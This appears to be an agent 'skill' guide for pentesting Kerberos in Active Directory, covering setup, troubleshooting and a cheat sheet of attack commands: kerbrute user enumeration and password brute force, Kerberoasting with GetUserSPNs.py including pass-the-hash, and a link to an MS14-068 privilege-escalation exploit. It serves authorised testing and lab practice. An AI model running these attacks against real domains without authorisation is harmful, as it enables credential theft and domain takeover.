Kerberos Pentesting Skill

A comprehensive guide for pentesting Kerberos authentication services in Active Directory environments.

What This Skill Does

This skill helps you:

• Set up Kerberos authentication for pentesting tools
• Troubleshoot Kerberos connection issues
• Enumerate users and services via Kerberos
• Perform Kerberos-based attacks and exploitation
• Configure proper time synchronization and realm settings

Quick Start

1. Time Synchronization (Critical)

Kerberos requires time sync within 5 minutes. If your clock is skewed, you'll see

KRB_AP_ERR_SKEW

errors.

# Quick one-shot sync (requires sudo)
sudo ntpdate <dc.fqdn>
# Alternative with chronyd
sudo chronyd -q 'server <dc.fqdn> iburst'

2. Generate krb5.conf

You need a valid krb5.conf for the target realm. Use netexec to generate one:

# Generate krb5.conf while testing SMB
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf

# Install it
sudo cp krb5.conf /etc/krb5.conf

3. Obtain TGT and Verify

# Get Ticket Granting Ticket
kinit <user>

# Verify the ticket is in your ccache
klist

4. Use Kerberos with Tools

# netexec / CME with Kerberos (no password needed)
netexec smb <dc.fqdn> -k

# SMB client with Kerberos
smbclient --kerberos //<dc.fqdn>/IPC$

# SSH with GSSAPI (OpenSSH to Windows OpenSSH)
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>

Common Issues and Solutions

"Server not found in Kerberos database"

This means the FQDN you're using doesn't match the host SPN. Ensure:

• Your

  /etc/hosts

  resolves the exact FQDN you'll connect to
• The FQDN comes before any bare domain entries if overriding DNS
• You're using the correct realm name in krb5.conf

"STATUS_NOT_SUPPORTED" on SMB

NTLM is disabled on the target. Force Kerberos:

netexec smb <dc.fqdn> -k  # The -k flag forces Kerberos

"KRB_AP_ERR_SKEW"

Time is out of sync. Run the time sync commands above.

Enumeration and Attacks

User Enumeration

# Enumerate users via Kerberos
nmap -p 88 --script=krb5-enum-users \
  --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} \
  {IP}

Brute Force with kerbrute

# Clone kerbrute
git clone https://github.com/ropnop/kerbrute.git ./kerbrute
cd kerbrute && go build

# User enumeration
./kerbrute userenum -d domain.com -u users.txt

# Password brute force
./kerbrute bruteuser -d domain.com -u username -p passwords.txt

GetUserSPNs.py

Get Service Principal Names for potential Kerberoasting:

# Request SPNs
GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs

# With hash
GetUserSPNs.py -hashes :{hash} -dc-ip {IP} active.htb/svc_tgs

MS14-068 Exploitation

The MS14-068 vulnerability allows tampering with Kerberos login tokens to claim elevated privileges (e.g., Domain Admin).

Reference: https://adsecurity.org/?p=541

Exploit: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek

Helper Scripts

Use the bundled scripts for common tasks:

• scripts/check-krb5-config.sh

  - Validate your krb5.conf setup

• scripts/sync-time.sh

  - Quick time synchronization

• scripts/test-kerberos-auth.sh

  - Test Kerberos authentication

Important Notes

1. Kerberos authenticates, doesn't authorize - It confirms user identity but doesn't manage resource permissions. Services handle access control after authentication.

2. Always use FQDNs - Kerberos is sensitive to exact hostname matching. Use fully qualified domain names.

3. CCache is key - Once you have a TGT in your ccache, you can authenticate without passwords. Keep it secure.

4. NTLM vs Kerberos - If NTLM is disabled on domain services, you MUST use Kerberos. Add

   -k

   to tools that support it.

References

• NetExec (CME) wiki – Kerberos
• OpenSSH GSSAPIAuthentication
• MIT Kerberos – Using Kerberos on UNIX
• 0xdf – HTB: TheFrizz
• MS14-068 Analysis